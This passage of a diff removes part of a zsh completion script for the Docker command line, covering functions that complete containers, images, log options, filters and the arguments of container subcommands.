-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line
-    lines=(${lines[2,-1]})
-
-    # Container ID
-    if [[ $type = (ids|all) ]]; then
-        for line in $lines; do
-            s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}"
-            s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}"
-            s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}"
-            if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then
-                stopped=($stopped $s)
-            else
-                running=($running $s)
-            fi
-        done
-    fi
-
-    # Names: we only display the one without slash. All other names
-    # are generated and may clutter the completion. However, with
-    # Swarm, all names may be prefixed by the swarm node name.
-    if [[ $type = (names|all) ]]; then
-        for line in $lines; do
-            names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}})
-            # First step: find a common prefix and strip it (swarm node case)
-            (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/}
-            # Second step: only keep the first name without a /
-            s=${${names:#*/*}[1]}
-            # If no name, well give up.
-            (( $#s != 0 )) || continue
-            s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}"
-            s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}"
-            if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then
-                stopped=($stopped $s)
-            else
-                running=($running $s)
-            fi
-        done
-    fi
-
-    [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0
-    [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0
-    return ret
-}
-
-__docker_complete_stopped_containers() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_containers stopped all "$@"
-}
-
-__docker_complete_running_containers() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_containers running all "$@"
-}
-
-__docker_complete_containers() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_containers all all "$@"
-}
-
-__docker_complete_containers_ids() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_containers all ids "$@"
-}
-
-__docker_complete_containers_names() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_containers all names "$@"
-}
-
-__docker_complete_info_plugins() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    emulate -L zsh
-    setopt extendedglob
-    local -a plugins
-    plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: })
-    _describe -t plugins "$1 plugins" plugins && ret=0
-    return ret
-}
-
-__docker_complete_images() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a images
-    images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}})
-    _describe -t docker-images "images" images && ret=0
-    __docker_complete_repositories_with_tags && ret=0
-    return ret
-}
-
-__docker_complete_repositories() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a repos
-    repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]})
-    repos=(${repos#<none>})
-    _describe -t docker-repos "repositories" repos && ret=0
-    return ret
-}
-
-__docker_complete_repositories_with_tags() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a repos onlyrepos matched
-    declare m
-    repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *})
-    repos=(${${repos%:::<none>}#<none>})
-    # Check if we have a prefix-match for the current prefix.
-    onlyrepos=(${repos%::*})
-    for m in $onlyrepos; do
-        [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && {
-            # Yes, complete with tags
-            repos=(${${repos/:::/:}/:/\\:})
-            _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0
-            return ret
-        }
-    done
-    # No, only complete repositories
-    onlyrepos=(${${repos%:::*}/:/\\:})
-    _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0
-
-    return ret
-}
-
-__docker_search() {
-    [[ $PREFIX = -* ]] && return 1
-    local cache_policy
-    zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
-    if [[ -z "$cache_policy" ]]; then
-        zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy
-    fi
-
-    local searchterm cachename
-    searchterm="${words[$CURRENT]%/}"
-    cachename=_docker-search-$searchterm
-
-    local expl
-    local -a result
-    if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \
-        && ! _retrieve_cache ${cachename#_}; then
-        _message "Searching for ${searchterm}..."
-        result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]})
-        _store_cache ${cachename#_} result
-    fi
-    _wanted dockersearch expl 'available images' compadd -a result
-}
-
-__docker_get_log_options() {
-    [[ $PREFIX = -* ]] && return 1
-
-    integer ret=1
-    local log_driver=${opt_args[--log-driver]:-"all"}
-    local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options
-
-    awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream")
-    fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag")
-    gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels")
-    gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag")
-    journald_options=("env" "labels" "tag")
-    json_file_options=("env" "labels" "max-file" "max-size")
-    logentries_options=("logentries-token")
-    syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag")
-    splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag")
-
-    [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0
-    [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0
-    [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0
-    [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0
-    [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0
-    [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0
-    [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0
-    [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0
-    [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0
-
-    return ret
-}
-
-__docker_complete_log_drivers() {
-    [[ $PREFIX = -*  ]] && return 1
-    integer ret=1
-    drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog)
-    _describe -t log-drivers "log drivers" drivers && ret=0
-    return ret
-}
-
-__docker_complete_log_options() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (syslog-format)
-                syslog_format_opts=('rfc3164' 'rfc5424' 'rfc5424micro')
-                _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        __docker_get_log_options -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_detach_keys() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    compset -P "*,"
-    keys=(${:-{a-z}})
-    ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}})
-    _describe -t detach_keys "[a-z]" keys -qS "," && ret=0
-    _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0
-}
-
-__docker_complete_pid() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local -a opts vopts
-
-    opts=('host')
-    vopts=('container')
-
-    if compset -P '*:'; then
-        case "${${words[-1]%:*}#*=}" in
-            (container)
-                __docker_complete_running_containers && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0
-        _describe -t pid-opts "PID Options" opts && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_runtimes() {
-    [[ $PREFIX = -*  ]] && return 1
-    integer ret=1
-
-    emulate -L zsh
-    setopt extendedglob
-    local -a runtimes_opts
-    runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}})
-    _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0
-}
-
-__docker_complete_ps_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (ancestor)
-                __docker_complete_images && ret=0
-                ;;
-            (before|since)
-                __docker_complete_containers && ret=0
-                ;;
-            (health)
-                health_opts=('healthy' 'none' 'starting' 'unhealthy')
-                _describe -t health-filter-opts "health filter options" health_opts && ret=0
-                ;;
-            (id)
-                __docker_complete_containers_ids && ret=0
-                ;;
-            (is-task)
-                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
-                ;;
-            (name)
-                __docker_complete_containers_names && ret=0
-                ;;
-            (network)
-                __docker_complete_networks && ret=0
-                ;;
-            (status)
-                status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing')
-                _describe -t status-filter-opts "status filter options" status_opts && ret=0
-                ;;
-            (volume)
-                __docker_complete_volumes && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume')
-        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_search_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a boolean_opts opts
-
-    boolean_opts=('true' 'false')
-    opts=('is-automated' 'is-official' 'stars')
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (is-automated|is-official)
-                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_images_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a boolean_opts opts
-
-    boolean_opts=('true' 'false')
-    opts=('before' 'dangling' 'label' 'reference' 'since')
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (before|reference|since)
-                __docker_complete_images && ret=0
-                ;;
-            (dangling)
-                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_events_filter() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a opts
-
-    opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume')
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (container)
-                __docker_complete_containers && ret=0
-                ;;
-            (daemon)
-                emulate -L zsh
-                setopt extendedglob
-                local -a daemon_opts
-                daemon_opts=(
-                    ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}}
-                    ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:}
-                )
-                _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0
-                ;;
-            (event)
-                local -a event_opts
-                event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach'
-                'exec_start' 'export' 'health_status' 'import' 'kill' 'load'  'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start'
-                'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update')
-                _describe -t event-filter-opts "event filter options" event_opts && ret=0
-                ;;
-            (image)
-                __docker_complete_images && ret=0
-                ;;
-            (network)
-                __docker_complete_networks && ret=0
-                ;;
-            (type)
-                local -a type_opts
-                type_opts=('container' 'daemon' 'image' 'network' 'volume')
-                _describe -t type-filter-opts "type filter options" type_opts && ret=0
-                ;;
-            (volume)
-                __docker_complete_volumes && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_prune_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a opts
-
-    opts=('until')
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-# BO container
-
-__docker_container_commands() {
-    local -a _docker_container_subcommands
-    _docker_container_subcommands=(
-        "attach:Attach to a running container"
-        "commit:Create a new image from a container's changes"
-        "cp:Copy files/folders between a container and the local filesystem"
-        "create:Create a new container"
-        "diff:Inspect changes on a container's filesystem"
-        "exec:Run a command in a running container"
-        "export:Export a container's filesystem as a tar archive"
-        "inspect:Display detailed information on one or more containers"
-        "kill:Kill one or more running containers"
-        "logs:Fetch the logs of a container"
-        "ls:List containers"
-        "pause:Pause all processes within one or more containers"
-        "port:List port mappings or a specific mapping for the container"
-        "prune:Remove all stopped containers"
-        "rename:Rename a container"
-        "restart:Restart one or more containers"
-        "rm:Remove one or more containers"
-        "run:Run a command in a new container"
-        "start:Start one or more stopped containers"
-        "stats:Display a live stream of container(s) resource usage statistics"
-        "stop:Stop one or more running containers"
-        "top:Display the running processes of a container"
-        "unpause:Unpause all processes within one or more containers"
-        "update:Update configuration of one or more containers"
-        "wait:Block until one or more containers stop, then print their exit codes"
-    )
-    _describe -t docker-container-commands "docker container command" _docker_container_subcommands
-}
-
-__docker_container_subcommand() {
-    local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update
-    local expl help="--help"
-    integer ret=1
-
-    opts_attach_exec_run_start=(
-        "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys"
-    )
-    opts_create_run=(
-        "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout or stderr]:device:(STDIN STDOUT STDERR)"
-        "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: "
-        "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: "
-        "($help)*--cap-add=[Add Linux capabilities]:capability: "
-        "($help)*--cap-drop=[Drop Linux capabilities]:capability: "
-        "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: "
-        "($help)--cidfile=[Write the container ID to the file]:CID file:_files"
-        "($help)--cpus=[Number of CPUs (default 0.000)]:cpus: "
-        "($help)*--device=[Add a host device to the container]:device:_files"
-        "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: "
-        "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: "
-        "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: "
-        "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: "
-        "($help)--disable-content-trust[Skip image verification]"
-        "($help)*--dns=[Custom DNS servers]:DNS server: "
-        "($help)*--dns-option=[Custom DNS options]:DNS option: "
-        "($help)*--dns-search=[Custom DNS search domains]:DNS domains: "
-        "($help)*"{-e=,--env=}"[Environment variables]:environment variable: "
-        "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: "
-        "($help)*--env-file=[Read environment variables from a file]:environment file:_files"
-        "($help)*--expose=[Expose a port from the container without publishing it]: "
-        "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups"
-        "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts"
-        "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]"
-        "($help)--init[Run an init inside the container that forwards signals and reaps processes]"
-        "($help)--ip=[Container IPv4 address]:IPv4: "
-        "($help)--ip6=[Container IPv6 address]:IPv6: "
-        "($help)--ipc=[IPC namespace to use]:IPC namespace: "
-        "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)"
-        "($help)*--link=[Add link to another container]:link:->link"
-        "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: "
-        "($help)*"{-l=,--label=}"[Container metadata]:label: "
-        "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers"
-        "($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options"
-        "($help)--mac-address=[Container MAC address]:MAC address: "
-        "($help)--name=[Container name]:name: "
-        "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)"
-        "($help)*--network-alias=[Add network-scoped alias for the container]:alias: "
-        "($help)--oom-kill-disable[Disable OOM Killer]"
-        "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]"
-        "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]"
-        "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]"
-        "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports"
-        "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid"
-        "($help)--privileged[Give extended privileges to this container]"
-        "($help)--read-only[Mount the container's root filesystem as read only]"
-        "($help)*--security-opt=[Security options]:security option: "
-        "($help)*--shm-size=[Size of '/dev/shm' (format is '<number><unit>')]:shm size: "
-        "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: "
-        "($help)*--sysctl=-[sysctl options]:sysctl: "
-        "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]"
-        "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users"
-        "($help)*--ulimit=[ulimit options]:ulimit: "
-        "($help)--userns=[Container user namespace]:user namespace:(host)"
-        "($help)--tmpfs[mount tmpfs]"
-        "($help)*-v[Bind mount a volume]:volume: "
-        "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)"
-        "($help)*--volumes-from=[Mount volumes from the specified container]:volume: "
-        "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories"
-    )
-    opts_create_run_update=(
-        "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)"
-        "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)"
-        "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: "
-        "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: "
-        "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: "
-        "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: "
-        "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: "
-        "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: "
-        "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: "
-        "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: "
-        "($help)--memory-reservation=[Memory soft limit]:Memory limit: "
-        "($help)--memory-swap=[Total memory limit with swap]:Memory limit: "
-        "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)"
-    )
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (attach)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_attach_exec_run_start \
-                "($help)--no-stdin[Do not attach stdin]" \
-                "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \
-                "($help -):containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (commit)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --author)"{-a=,--author=}"[Author]:author: " \
-                "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \
-                "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \
-                "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \
-                "($help -):container:__docker_complete_containers" \
-                "($help -): :__docker_complete_repositories_with_tags" && ret=0
-            ;;
-        (cp)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol link]" \
-                "($help -)1:container:->container" \
-                "($help -)2:hostpath:_files" && ret=0
-            case $state in
-                (container)
-                    if compset -P "*:"; then
-                        _files && ret=0
-                    else
-                        __docker_complete_containers -qS ":" && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (create)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_create_run \
-                $opts_create_run_update \
-                "($help -): :__docker_complete_images" \
-                "($help -):command: _command_names -e" \
-                "($help -)*::arguments: _normal" && ret=0
-            case $state in
-                (link)
-                    if compset -P "*:"; then
-                        _wanted alias expl "Alias" compadd -E "" && ret=0
-                    else
-                        __docker_complete_running_containers -qS ":" && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (diff)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:containers:__docker_complete_containers" && ret=0
-            ;;
-        (exec)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_attach_exec_run_start \
-                "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \
-                "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \
-                "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \
-                "($help)--privileged[Give extended Linux capabilities to the command]" \
-                "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \
-                "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \
-                "($help -):containers:__docker_complete_running_containers" \
-                "($help -)*::command:->anycommand" && ret=0
-            case $state in
-                (anycommand)
-                    shift 1 words
-                    (( CURRENT-- ))
-                    _normal && ret=0
-                    ;;
-            esac
-            ;;
-        (export)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \
-                "($help -)*:containers:__docker_complete_containers" && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help -s --size)"{-s,--size}"[Display total file sizes]" \
-                "($help -)*:containers:__docker_complete_containers" && ret=0
-            ;;
-        (kill)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \
-                "($help -)*:containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (logs)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--details[Show extra details provided to logs]" \
-                "($help -f --follow)"{-f,--follow}"[Follow log output]" \
-                "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \
-                "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \
-                "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \
-                "($help -)*:containers:__docker_complete_containers" && ret=0
-            ;;
-        (ls|list)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Show all containers]" \
-                "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \
-                "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \
-                "($help)--format=[Pretty-print containers using a Go template]:template: " \
-                "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \
-                "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
-                "($help -s --size)"{-s,--size}"[Display total file sizes]" \
-                "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0
-            ;;
-        (pause|unpause)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (port)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)1:containers:__docker_complete_running_containers" \
-                "($help -)2:port:_ports" && ret=0
-            ;;
-        (prune)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
-                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
-            ;;
-        (rename)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -):old name:__docker_complete_containers" \
-                "($help -):new name: " && ret=0
-            ;;
-        (restart)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \
-                "($help -)*:containers:__docker_complete_containers_ids" && ret=0
-            ;;
-        (rm)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Force removal]" \
-                "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \
-                "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \
-                "($help -)*:containers:->values" && ret=0
-            case $state in
-                (values)
-                    if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then
-                        __docker_complete_containers && ret=0
-                    else
-                        __docker_complete_stopped_containers && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (run)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_create_run \
-                $opts_create_run_update \
-                $opts_attach_exec_run_start \
-                "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \
-                "($help)--health-cmd=[Command to run to check health]:command: " \
-                "($help)--health-interval=[Time between running the check]:time: " \
-                "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \
-                "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \
-                "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \
-                "($help)--rm[Remove intermediate containers when it exits]" \
-                "($help)--runtime=[Name of the runtime to be used for that container]:runtime:__docker_complete_runtimes" \
-                "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \
-                "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \
-                "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \
-                "($help -): :__docker_complete_images" \
-                "($help -):command: _command_names -e" \
-                "($help -)*::arguments: _normal" && ret=0
-            case $state in
-                (link)
-                    if compset -P "*:"; then
-                        _wanted alias expl "Alias" compadd -E "" && ret=0
-                    else
-                        __docker_complete_running_containers -qS ":" && ret=0
-                    fi
-                    ;;
-                (storage-opt)
-                    if compset -P "*="; then
-                        _message "value" && ret=0
-                    else
-                        opts=('size')
-                        _describe -t filter-opts "storage options" opts -qS "=" && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (start)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_attach_exec_run_start \
-                "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \
-                "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \
-                "($help -)*:containers:__docker_complete_stopped_containers" && ret=0
-            ;;
-        (stats)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \
-                "($help)--format=[Pretty-print images using a Go template]:template: " \
-                "($help)--no-stream[Disable streaming stats and only pull the first result]" \
-                "($help -)*:containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (stop)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \
-                "($help -)*:containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (top)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)1:containers:__docker_complete_running_containers" \
-                "($help -)*:: :->ps-arguments" && ret=0
-            case $state in
-                (ps-arguments)
-                    _ps && ret=0
-                    ;;
-            esac
-            ;;
-        (update)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                opts_create_run_update \
-                "($help -)*: :->values" && ret=0
-            case $state in
-                (values)
